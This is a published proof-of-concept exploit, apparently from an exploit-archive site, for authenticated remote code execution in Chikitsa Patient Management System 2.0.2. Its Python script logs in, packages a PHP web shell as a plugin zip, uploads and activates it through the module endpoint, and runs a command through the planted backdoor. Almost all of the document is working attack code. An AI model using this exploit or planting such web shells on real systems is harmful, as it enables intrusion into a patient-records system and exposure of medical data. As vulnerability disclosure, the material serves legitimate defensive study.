Authored by 0z09e

Chikitsa Patient Management System version 2.0.2 suffers from a plugin related authenticated remote code execution vulnerability.

# Exploit Title: Chikitsa Patient Management System 2.0.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 03/12/2021
# Exploit Author: 0z09e (https://twitter.com/0z09e)
# Vendor Homepage: https://sourceforge.net/u/dharashah/profile/
# Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download
# Version: 2.0.2
# Tested on: Ubuntu

import requests
import os
import argparse

def login(session , target , username , password):
  print("[+] Attempting to login with the credential")
  url = target + "/index.php/login/valid_signin"
  login_data = {"username" : username , "password" : password}
  session.post(url , data=login_data , verify=False)
  return session

def generate_plugin():
  print("[+] Generating a malicious plugin")
  global tmp_dir
  tmp_dir = os.popen("mktemp -d").read().rstrip()
  open(f"{tmp_dir}/rce.php" , "w").write("<?php system($_REQUEST['cmd']);?>")
  os.popen(f"cd {tmp_dir} && zip rce.zip rce.php").read()

def upload_plugin(session , target):
  print("[+] Uploading the plugin into the server.")
  url = target + "/index.php/module/upload_module/"
  file = open(f"{tmp_dir}/rce.zip" , "rb").read()
  session.post(url , verify=False ,files = {"extension" : ("rce.zip" , file)})
  session.get(target + "/index.php/module/activate_module/rce" , verify=False)
  print(f"[+] Backdoor Deployed at : {target}/application/modules/rce.php")
  print(f"[+] Example Output : {requests.get(target +'/application/modules/rce.php?cmd=id' , verify=False).text}")

def main():
  parser = argparse.ArgumentParser("""
            __    _ __   _ __            
  _____/ /_  (_) /__(_) /__________ _
 / ___/ __ / / //_/ / __/ ___/ __ `/
/ /__/ / / / / ,< / / /_(__  ) /_/ / 
___/_/ /_/_/_/|_/_/__/____/__,_/  

Chikitsa Patient Management System 2.0.2 Authenticated Plugin Upload Remote Code Execution : 
POC Written By - 0z09e (https://twitter.com/0z09e)nn""" , formatter_class=argparse.RawTextHelpFormatter)
  req_args = parser.add_argument_group('required arguments')
  req_args.add_argument("URL" , help="Target URL. Example : http://10.20.30.40/path/to/chikitsa")
  req_args.add_argument("-u" , "--username" , help="Username" , required=True)
  req_args.add_argument("-p" , "--password" , help="password", required=True)
  args = parser.parse_args()

  target = args.URL
  if target[-1] == "/":
    target = target[:-1]
  username = args.username
  password = args.password

  session = requests.session()
  login(session , target , username , password)
  generate_plugin()
  upload_plugin(session , target)

if __name__ == "__main__":
  main()

RELATED ARTICLESMORE FROM AUTHOR